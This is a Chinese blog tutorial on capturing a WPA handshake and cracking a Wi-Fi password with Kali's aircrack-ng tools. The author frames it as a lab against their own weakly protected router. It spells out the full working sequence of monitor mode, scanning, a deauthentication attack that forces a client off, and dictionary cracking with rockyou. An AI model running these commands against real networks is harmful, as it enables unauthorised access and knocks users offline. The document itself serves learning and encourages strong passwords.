写在前面,纯粹是交流学习,我是好人,不要封我的文章了23333这里建议自己家的无线网密码设置的复杂点,不要使用弱密码!!!!
0x00
0.破解使用别人的密码是违法的,这里使用的是自己搭建的玩着玩,使用的也是弱密码。
1.首先需要一个支持监控模式的无线网卡,这里使用的是TP-LINK的TL-WN722N,淘宝很多随便买一个也行(tp-link tl-wn726n这个好像是免驱动,看淘宝销量比较多)
2.kali Linux
0x01
其实暴力破解最重要的就是字典。kali里面其实就内置了很多字典,但是说实话在国内不是很通用,毕竟是外国人的系统,字典也是按照外国人的习惯来的,在国内不是很通用,以后有机会我在弄一个国内通用的字典吧。。。。以后 = =
这里实验使用的弱密码也是够用的。拿kali的一个自带的字典rockyou,位于/usr/share/wordlists/rockyou.txt.gz
先解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz
查看可以用的无线网卡的名字:
airmon-ng
开启无线网卡的监控模式:
airmon-ng start wlan0 //一般是wlan0这个名字,我的就是
有的在执行这个命令成功后网卡接口会变成wlan0mon,这里可以使用ifconfig查看。
----我的就没有变不知道为什么,还是wlan0
扫描附近网络,发现目标:
airodump-ng wlan0
image.png
我。。。我刚重做去截图又出现了,变名了。。
image.png这几列都是需要用到的信息。
BSSID:是路由器的MAC地址
CH:信道
ESSID:WiFi的名字
PWR:信号强度
DATA:传输的数据量
ENC:加密类型
这里默认是一直不断的监听,获取到目标WiFi以后就可以Ctrl+C结束监听。
抓取握手包
airodump-ng --bssid 00:87:36:2F:AF:74 -c 6 wlan0mon -w qwer
image.png
可以看到这里目标网络是有一个终端正在连接使用,然后我们就是需要让他断开连接,在连接的时候我们就可以抓取到含有密码的握手包了。
这里如果在我们抓包的时候没有新终端加入进来进行连接的话我们是没办法抓到需要的握手包的。这时候我们就强制让他断开重连。
aireplay-ng -0 10 -a 00:87:36:2F:AF:74 -c B4:0B:44:C0:D2:18 wlan0mon
image.png
当出现WPA handshake就说明抓到握手包了。
进行密码破译:
aircrack-ng -a2 -b 00:87:36:2F:AF:74 -w /usr/share/wordlists/rockyou.txt ~/*.cap
image.png
这里一直在破着,破解的成功率和效率取决于你的字典。成功的话就会显示在红框里。
网友评论